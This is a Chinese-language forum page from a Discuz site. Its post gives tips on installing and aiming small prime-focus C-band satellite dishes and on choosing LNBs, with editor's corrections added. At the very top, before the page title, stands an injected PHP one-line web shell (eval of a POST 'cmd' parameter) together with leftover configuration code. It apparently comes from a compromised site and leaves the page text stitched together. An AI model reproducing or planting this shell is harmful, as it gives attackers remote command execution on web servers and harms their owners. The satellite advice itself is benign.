');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 關於小型C波段正饋天線使用經驗談 - 3C專區 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

關於小型C波段正饋天線使用經驗談

隨著衛星功率的不斷增大,小口徑天線也有了用武之地。 近日,四川視頻、通達等公司推出了1.2米和1米的C波段正饋天線,為受安裝條件限制的"陽台族"們帶來了福音。但由於其口徑小,所以與普通天線的使用稍有區別,下面就來談幾點經驗及技巧(以四川視頻1米C波段天線為例):

  1、天線一定要裝配好。特別是天線各處的螺絲一定要擰牢。筆者有一次裝天線時,認為只要把螺絲擰到8分緊就行了。結果裝好後收105.5°E時,無論怎樣調都只能看幾個強台,無意中用螺絲刀把饋源盤上的螺絲擰緊後節目居然全部下來了(編者註:其根本原因是螺絲松影響了天線精度)。

  2、高頻頭一定要用高增益的,這是能否成功接收的關鍵(編者註:不應盲目追求高增益,因為放大信號的同時也放大了噪聲,因此應選擇噪聲較低的高頻頭)。因為1米天線的增益無論如何也沒有1.5米的增益高,所以只能用高增益的高頻頭來補償。為此,筆者試用過多款高頻頭。發現在1.5米天線上表現還可以的高頻頭在1米天線上的表現大部分都不盡如人意。只有公認的OS-222和PBI-1800表現仍然優秀,雖然信號較1.5米天線比有所下降,但並不影響收看。在這兩款高頻頭中,PBI-1800的增益還要高些,但價格也要高幾十元。

  3、調試時一定要細心,雖然C波段的方向性沒有Ku波段那麼強,但因為口徑較小方向性就比1.5米的強(編者註:事實上,根據天線理論,口徑越大的天線的半功率角越小,方向性越強。作者所提到的問題,可能是小天線的精度優於大天線所引起的。同理,前文提到的C波段與Ku波段天線方向性的差別,也是波長差異和天線精度差異共同造成的),所以調試速度一定要慢。實踐證明,1米的正饋天線只要方位角偏1度,仰角偏0.5度就會沒有信號。

  4、因為口徑較小,增益較低,所以小口徑天線只適合接收大功率衛星。從收視價值考慮,在本地接收166°E、134°E、105.5°E、100.5°E、88°E衛星都是不錯的選擇。

  此外,該天線還可以配合正饋Ku高頻頭「一鍋多星」接收Ku波段信號,可以節省一面天線,降低接收成本。但要注意,所接收的Ku波段衛星和C波段衛星的經度差不能太大。
返回列表